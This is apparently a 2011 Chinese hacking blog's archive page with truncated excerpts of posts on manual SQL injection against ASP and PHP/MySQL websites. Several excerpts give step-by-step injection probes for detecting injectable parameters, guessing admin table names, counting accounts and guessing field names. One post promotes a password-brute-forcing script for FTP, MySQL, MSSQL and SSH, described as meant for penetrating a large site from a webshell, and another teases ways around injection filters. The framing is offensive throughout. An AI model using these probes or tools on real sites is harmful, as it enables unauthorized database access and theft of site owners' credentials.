2011年03月12日 星期六 10:36 P.M.
2011年01月31日 星期一 1:30 A.M.
ASP详细手工注入表!.
猜测是否存在漏洞
===============================
and 1=1 返回正常页面
===============================
|
2011年01月30日 星期日 2:10 P.M.
2011年01月30日 星期日 2:09 P.M.
2011年01月15日 星期六 1:20 P.M.
初探MYSQL的如何注入
大家都知道,危害我们网站安全较多的漏洞还是注射漏洞。无论腾讯、百度、SINA等等大型网站都惊现过注入漏洞,今天讲解的是PHP+MYSQL的注入。我们注重的不是WEB语言而是数据库.了解一条SQL语句是如何运行。
常规WEB语
-
大家都知道,危害我们网站安全较多的漏洞还是注射漏洞。无论腾讯、百度、SI |
2011年01月13日 星期四 8:57 P.M.
1.判断有无注入点
' ; and 1=1 and 1=2
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判断是否存在admin这张表
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称 |
2011年01月13日 星期四 8:56 P.M.
2011年01月13日 星期四 8:55 P.M.
【判断有无注入点】
'
and 1=1
and 1=2
【猜表一般表的名称无非是:admin adminuser user pass password】
and 0(select count(*) from *)
and 0(select count(*) from admin) //判断是否存在admin这张表
【猜帐号数目】
and 1=(select count(*) from admin where len(name)>0)
|
2011年01月12日 星期三 11:31 P.M.
PHP扫FTP\MYSQL\MSSQL\SSH密码的脚本
帮我们公司的某猥琐男写的。据说是渗透某个大站要用到。
可以扫FTP\MYSQL\MSSQL\SSH密码
比如webshell在linux下。不会在LINUX下渗透。可以试试这个。
|
2011年01月12日 星期三 11:25 P.M.
网站注入如何绕过限制!
♤ 关闭侧边栏 15 Views 2011.01.11
以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“'”号和“=”号过滤的突破,虽然有 |
